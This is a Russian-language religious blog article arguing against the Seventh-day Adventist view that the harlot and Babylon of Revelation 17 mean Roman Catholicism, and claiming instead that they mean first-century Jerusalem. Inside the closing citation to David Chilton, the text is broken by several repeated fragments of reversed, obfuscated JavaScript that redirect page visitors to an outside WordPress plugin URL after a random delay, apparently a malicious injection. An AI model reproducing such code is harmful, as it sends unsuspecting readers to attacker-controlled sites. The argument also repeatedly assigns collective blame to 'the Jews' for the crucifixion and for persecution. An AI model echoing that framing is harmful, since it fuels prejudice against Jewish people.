Исследования Книга Откровение

«Вавилон» и «блудница» из книги Откровение: о ком речь?На чтение 13 мин

Учение АСД о «Вавилоне» и «блуднице»

Для адвентистов седьмого дня библейское пророчество — это всё о борьбе Церкви АСД против чтущих/хранящих воскресенье во главе с римокатолической церковью, которую они обвиняют в том, что именно РКЦ изменила Божий день поклонения. Стремясь определить католицизм как злую сущность, адвентизму удаётся привязать католицизм почти к каждому злому зверю или злой женщине, которых изображает библейское пророчество! Поэтому неудивительно, что адвентисты идентифицируют багряного зверя из Откровения 17, блудницу из Откровения 17 и Вавилон как римский католицизм.

Следующие цитаты взяты из семинара по книге Откровение:

1. Блудница кн. Откровение, 17 — это римский католицизм

«И на челе ее написано имя, тайна: Вавилон великий, мать блудницам и мерзостям земным». (Откр.17:5)

Здесь символично показана великая церковь-мать и её дочери. Не нужно быть гением, чтобы понять, кто это. Великая Римская церковь претендует на роль материнской церкви.

Revelation Seminar Studies, Lesson 21, «Mystic Babylon the Harlot»

2. Протестантские церкви тоже «блудница»

«Дочери, которые произошли от неё, «запротестовали» и отпали, и стали известны как протестанты. Имя Вавилон — это семейное имя (родовое), включающее в себя и мать и детей. Это шокирует и отрезвляет осознание тем, что Бог недвусмысленно обвиняет и мать, и дочерей, как падших».

Revelation Seminar Studies, Lesson 21, «Mystic Babylon the Harlot»

3. Бог призывает христиан из католических и протестантских церквей присоединиться к Церкви АСД

«И услышал я иной голос с неба, говорящий: выйди от неё, народ Мой, чтобы не участвовать вам в грехах её и не подвергнуться язвам её». (Откр.18:4)

«Это повеление Божьему народу. Многие до сих пор в Вавилоне. Бог с любовью призывает их, прежде чем язвы обрушатся на Вавилон. … Её ложные учения — причина, по которой Бог наказал её и призвал Свой народ».

Revelation Seminar Studies, Lesson 21, «Mystic Babylon the Harlot»

4. Зверь из Откровения, 17 — это папство

Зверь, которого ты видел, был, и нет его, и выйдет из бездны, и пойдет в погибель; и удивятся те из живущих на земле, имена которых не вписаны в книгу жизни от начала мира, видя, что зверь был, и нет его, и явится». (Откр.17:8)

«Обе главы книги Откровение, 13 и 17 изображают папство. … Падшая женщина — это отступническая церковь. Она едет верхом на звере (государстве или правительстве), что указывает на то, что она поддерживается государством и находится под его контролем. Здесь ясно обозначено сочетание церкви и государства».

5. «Семь гор» -это семь сил на протяжении всей христианской истории

«Здесь ум, имеющий мудрость. Семь голов суть семь гор, на которых сидит жена, и семь царей, из которых пять пали, один есть, а другой еще не пришёл, и когда придет, недолго ему быть. И зверь, который был и которого нет, есть восьмой, и из числа семи, и пойдет в погибель». (Откр.17:9-11)

«Поскольку временные рамки Откровения 17 относятся к периоду после 1260 лет папских гонений, мы предлагаем следующие приложения.

«Пять пали» (ст. 10):

  1. Вавилон
  2. Мидо-Персия
  3. Греция
  4. Рим
  5. Папство (в течение 1260 лет)

«Один есть» (ст. 10):

  1. Папство (от «смертельной раны» до исцеления)

«Другой ещё не пришёл» (ст. 10):

  1. Папство (от восстановления до поддержки десятью царями)

«Восьмой» (ст. 11):

  1. Папство (во время объединения десяти рогов)

Revelation Seminar Studies, Lesson 21, «Mystic Babylon the Harlot»

6. «Десять рогов» символизируют Европу

«И десять рогов, которые ты видел, суть десять царей, которые еще не получили царства, но примут власть со зверем, как цари, на один час». (Откр.17:12)

«Эти цари относятся к народам современной Европы»

Revelation Seminar Studies, Lesson 21, «Mystic Babylon the Harlot»

Проблемы в учении АСД о «Вавилоне» и «блуднице»

1. Действительно ли католицизм — блудница?

Откровение 17: 8 раскрывает личность женщины.

«Жена же, которую ты видел, есть великий город, царствующий над земными царями». (Откр.17:18)

Большинство людей бросают беглый взгляд на последнюю часть текста — «царствующий над земными царями» и сразу же приходят к выводу, что «великий город» — это именно Рим, город, правивший миром в эпоху Нового Завета. АСД искажают это положение и интерпретируют город как папский Рим. Однако Стронг отмечает, что греческое слово, означающее «царствовать», — это basileia, которое можно использовать для обозначения «владычества» и которое «не следует путать с настоящим царством, а скорее с правом или властью управлять царством».

Местом Божьей власти и Его правления на Земле в Ветхом Завете был Иерусалим.

«И возгремит Господь с Сиона, и даст глас Свой из Иерусалима; содрогнутся небо и земля; но Господь будет защитою для народа Своего и обороною для сынов Израилевых». (Иоиль 3:16)

«Благословен Господь от Сиона, живущий в Иерусалиме!» (Пс.134:21)

«В то время назовут Иерусалим престолом Господа; и все народы ради имени Господа соберутся в Иерусалим». (Иер.3:17)

«Господь возгремит с Сиона и даст глас Свой из Иерусалима» (Амос 1:2)

«Да отвратится гнев Твой и негодование Твое от града Твоего, Иерусалима» (Дан.9:16)

«Взойдем на гору Господню и в дом Бога Иаковлева, и Он научит нас путям Своим, и будем ходить по стезям Его, ибо от Сиона выйдет закон и слово Господне — из Иерусалима». (Мих.4:2)

«Так говорит Господь: обращусь Я к Сиону и буду жить в Иерусалиме, и будет называться Иерусалим городом истины, и гора Господа Саваофа — горою святыни». (Зах.8:3)

Иисус предупреждал людей не клясться «Иерусалимом, ибо это город великого Царя«. (см. Мф.5:35)

Кир был правителем крупнейшей империи на земле и мог построить храм в любом городе, но обратите внимание на то, что он говорит:

«Так говорит Кир, царь Персидский: Господь Бог небес дал мне все царства земли; и он поручил мне построить ему дом в Иерусалиме«.

Таким образом, даже языческие цари признавали Иерусалим центром духовного царства Бога на этой земле.

В Ветхом Завете Иерусалим называли «великим» городом:

«… поставил я стражами жителей Иерусалима, каждого на свою стражу и каждого напротив дома его. Но город был пространен и велик…» (Неемия 7:3-4)

«И многие народы будут проходить через город сей и говорить друг другу: «за что Господь так поступил с этим великим городом?» (Иер.22:8)

«Как одиноко сидит город, некогда многолюдный! он стал как вдова; великий между народами, князь над областями сделался данником». (Плач Иер.1:1)

В Откровении Иоанн конкретно говорит, что «великий город» был местом, где Иисус был распят.

«И трупы их оставит на улице великого города, который духовно называется Содом и Египет, где и Господь наш распят». (Откр.11:8)

Здесь Иоанн дает нам не такой уж и тонкий намёк на сущность «великого города». Был ли Иисус распят в Риме? Нет. В Вавилоне? Нет. В Иерусалиме? ДА!

Более того, даже Новый Иерусалим Иоанн называет «великим городом».

«И вознёс меня в духе на великую и высокую гору, и показал мне великий город, святой Иерусалим, который нисходил с неба от Бога». (Откр.21:10)

Библейские свидетельства просто ошеломляют, ясно говоря о том, что «великий город» в кн. Откровение — это отсылка к Иерусалиму, месту силы, власти и господства Бога на Земле.

Обратите внимание, как описание Иоанном Вавилона поразительно похоже на осуждение евреев Иисусом:

«Я видел, что жена упоена была кровью святых и кровью свидетелей Иисусовых, и, видя ее, дивился удивлением великим». (Откр.17:6)

«И в нем найдена кровь пророков и святых и всех убитых на земле». (Откр.18:24)
«Посему, вот, Я посылаю к вам пророков, и мудрых, и книжников; и вы иных убьете и распнете, а иных будете бить в синагогах ваших и гнать из города в город; да придет на вас вся кровь праведная, пролитая на земле, от крови Авеля праведного до крови Захарии, сына Варахиина, которого вы убили между храмом и жертвенником».
(Мф.23:34-35)

В заключение раздела следует отметить, что подавляющее большинство библейских свидетельств указывает на Иерусалим, а не на Рим, как на блудницу из Откровения, 17.

2. Протестантские церкви — блудницы?

Если католицизм — это «мать-блудница», а протестантские церкви, будучи детьми католической церкви, тоже блудницы, то к чему приводит такая логика мысли в отношении адвентистов седьмого дня? Кем является эта организация — «внучкой» вышеупомянутых блудниц?

Как мы читали выше, Иерусалим — это «блудница» из Откровения, 17. Термин «мать блудниц» не означает, что Иерусалим породил кучу религий. Пророк Осия называл Израиль «блудницей» и «матерью» (см. Осия 2:1-5). Подобный оборот речи встречается в Иез.16:44-48. Быть «матерью» и «блудницей» — это указывает на двойной позор. Быть одинокой и блудницей очень плохо, но иметь мужа и детей и при всём этом быть блудницей — это край нечестия и предосудительности! Такое блудодеяние не только порочно, но и выходит за рамки обычного блуда, демонстрируя полное презрение к священным институтам брака и семьи. Тот факт, что эта «блудница» ещё и «мать», говорит о совершенно отталкивающей природе такой женщины.

3. Призывает ли Бог христиан из католических и протестантских церквей присоединиться к Церкви АСД?

Адвентистам седьмого дня удобно называть все другие церкви «Вавилоном», чтобы они, АСД, могли выполнить якобы предназначенную им Богом миссию — призвать членов этих церквей присоединиться к своей собственной церкви. Однако, как видно из последних двух пунктов, адвентисты неправильно определили символы библейского пророчества, чтобы создать сценарий, который удобно определяет их как «хороших парней», а всех остальных — как «плохих парней«. Такое искажение библейского пророчества в соответствии с собственными целями кроме, как пародией не назовёшь.

4. Действительно ли багряный зверь из Откровения, 17 — папство?

Адвентисты справедливо полагают, что зверь из Откровения, 17 — это тот же зверь, что и зверь из Откровения, 13. Проблема в том, что они неверно истолковали зверя Откровения, 13 как папство (см. Исследование о звере Откровения, 13). Зверь Откровения, 13 легко идентифицируется как языческий Рим, как и зверь Откровения, 17. Апостол Пётр передавая привет от одной общины другой говорит, что церковь находится «в Вавилоне» (I Петр.5:13). Комментаторы усматривают в этом названии именно языческий Рим.

«Здесь ум, имеющий мудрость. Семь голов суть семь гор, на которых сидит жена» (Откр.17:9)

В этой воображаемой картине женщина восседает верхом на звере, а также сидит на «семи горах». Город Рим печально известен тем, что расположен среди семи холмов. Читавшие книгу Откровение в первом веке не могли не видеть связи между зверем, имеющим «семь гор», с Римом, обосновавшимся среди семи холмов. Тот факт, что женщина сидит на престоле римской власти, указывает на то, что страна совершила духовное прелюбодеяние против Бога и присоединилась к Римской империи, о чём свидетельствует заявление первосвященников еврейского народа: «Нет у нас царя, кроме кесаря (цезаря)» (Ин.19:15).

5. «Семь гор» — это семь мировых держав на протяжении всей истории?

Сценарий АСД о мировых державах, существовавший на протяжении многих долгих веков истории, опровергается в первой главе книги Откровение, где сказано, что описанные в ней события должны произойти «вскоре». Более того, семь гор символизируют «семь царей«, а не «семь империй» или «семь царств«, — «Семь голов суть семь гор … и семь царей» (Откр.17:9-10). Этих «царей» легко узнать. Зная, что Откровение было написано около 65 г. н.э., семь царей могут быть легко идентифицированы согласно Откр.17:10:

«Пятеро пали». Эти цезари умерли ещё до написания Откровения:

  1. Юлий
  2. Август
  3. Тиберий
  4. Калигула
  5. Клавдий

«Один есть», шестой цезарь, царствовал, когда Иоанн написал Откровение:

6. Нерон

«А другой еще не пришел, и когда придет, недолго ему быть».

7. Гальба, седьмой цезарь, царствовал менее семи месяцев

6. Представляют ли «десять рогов» Европу?

Эта интерпретация десяти рогов основана на неправильном понимании десяти рогов зверя из кн. Даниила, 7. В библейских пророчествах рога на звере всегда представляют царей или человеческих лидеров этой империи. Десять рогов не представляют другие империи. Они представляют царей/правителей, правивших Римской империей. Десять рогов представляют десять цезарей, правивших до совершенного прекращения действия Ветхого Завета и разрушения Иерусалима в 70 г. н.э.

Узнать больше о десяти рогах.

Учение Библии о «Вавилоне» и «блуднице»

Кто же «блудница» из Откровения, 17?*

Поскольку женщина восседает на семиглавом звере и названа «Вавилоном», некоторые решили, что она представляет город Рим. Но поскольку сам зверь — это Рим, это было бы излишним. Вавилон используется для обозначения врага Бога, которым в данном случае является Иерусалим.

Есть несколько причин отождествлять блудницу с Иерусалимом. Блудницу называют «Вавилоном». Вавилон назван великим городом в Откровении 14:8. Откровение 11:8 впервые упоминая о «великом городе», относит этот город к месту «где и Господь наш распят», то есть, несомненно, к Иерусалиму. Этот город велик не только из-за буквальных размеров, но из-за своего особого статуса города, находящегося в завете с Богом (в период Ветхого Завета). Сам Бог через пророка Исаию назвал народ Израиля «князьями Содомскими» и «народом Гоморрским» (см. Ис.1:10, вся эта глава описывает состояние Иудеи в общем и Иерусалима в частности, 1:1). То, что Иерусалим «духовно называется Содомом и Египтом» говорит о том, что он действует как враг Бога.

Согласно Откр.16:6; 17:6; 18:21, 24 «блудница» наполнена кровью святых. На протяжении всей книги Деяний Иерусалим изображается как гонитель христианства.

«Жестоковыйные! люди с необрезанным сердцем и ушами! вы всегда противитесь Духу Святому, как отцы ваши, так и вы. Кого из пророков не гнали отцы ваши? Они убили предвозвестивших пришествие Праведника, Которого предателями и убийцами сделались ныне вы» (Деян.7:51-52)

Иисус также засвидетельствовал что Его народ стал Его противником.

«Посему, вот, Я посылаю к вам пророков, и мудрых, и книжников; и вы иных убьёте и распнёте, а иных будете бить в синагогах ваших и гнать из города в город; да придёт на вас вся кровь праведная, пролитая на земле, от крови Авеля праведного до крови Захарии, сына Варахиина, которого вы убили между храмом и жертвенником. Истинно говорю вам, что всё сие придёт на род сей». (Мф.23:34-36)

Согласно Откр.17:4, цвета одежды блудницы лишь отчасти соответствуют цветам одежды еврейского священника. В кн. Исход 28 указаны цвета для одежды первосвященника. Первосвященник также носил на лбу диадему (тиару) с надписью «святыня Господня» (см. Исход 28:36-38, у еврейского первосвященника был кидар, к которому крепилась золотая дощечка с выгравированной на ней надписью «Святыня Господня»). Но у блудницы на лбу кощунственная диадема (тиара, кидар) (см. Откр.17:5). Как и в одежде, головной убор блудницы также напоминает головной убор первосвященника Божия, но всё же он отличен, ка и отлична надпись на дощечке. Итак, женщина должна была быть «святыней Господа», но стала «матерью блудниц».

Существует очевидный литературный контраст между блудницей и невестой, которая спускается с небес. Если мы сравним Откровение 21 и 17, мы увидим двух женщин: одна — чистая невеста, другая — блудница; одна — Иерусалим свыше, другая — Иерусалим земной. Павел говорил об этих двух Иерусалимах в Послании к Галатам 4:25-26:

«Ибо Агарь означает гору Синай в Аравии и соответствует нынешнему Иерусалиму, потому что он с детьми своими в рабстве; а вышний Иерусалим свободен: он — матерь всем нам».

Обратите внимание, как Иоанну показывают блудницу, и как ему показывают невесту. Это полная зеркальная противоположность.

«И пришел один из семи Ангелов, имеющих семь чаш, и, говоря со мною, сказал мне: подойди, я покажу тебе суд над великою блудницею, сидящею на водах многих» (Откр.17:1)«И пришел ко мне один из семи Ангелов, у которых было семь чаш, наполненных семью последними язвами, и сказал мне: пойди, я покажу тебе жену, невесту Агнца» (Откр.21:9)

Блудница сидит на языческом римском семиглавом звере. Это указывает не на идентичность с Римом, а на некоторую форму союза с Римом. Евреи были теми, кто требовал распятия Христа. Когда Пилот хотел освободить Иисуса, потому что не нашёл в Нём вины, евреи заявили:

«Но они закричали: возьми, возьми, распни Его! Пилат говорит им: Царя ли вашего распну? Первосвященники отвечали: нет у нас царя, кроме кесаря». (Ин.19:15)

Евреи были на стороне кесаря против Иисуса. Евреи постоянно подстрекали против христиан, чтобы вовлечь римлян в свои преследования. В Деяния 17:7 иудеи обвиняли христиан в том, что они проповедовали другого царя вопреки указам кесаря. Итак, блудница восседает на звере, потому что Иерусалим зависел от Рима в преследовании христиан.

*David Chiltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton, The Days of Vengeance.

Источник

Читать другие статьи по теме

Поделитесь своими мыслями ниже, в комментариях.

Оставить комментарий очень просто. Напишите ваше имя и эл. почту (для получения уведомлений о возможных вам ответах) и делитесь вашими мыслями в комментариях. Регистрация единоразовая.

Мы в соцсетях

Солёное радиоTelegram, YouTube, ВКонтакте, Яндекс Дзен

Открытая семинарияTelegram, YouTube, ВКонтакте, Яндекс Дзен

«Новости христианства» — Telegtam, Facebook, ВКонтакте

4.6/5

You Might Also Like

No Comments

    Leave a Reply

    Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.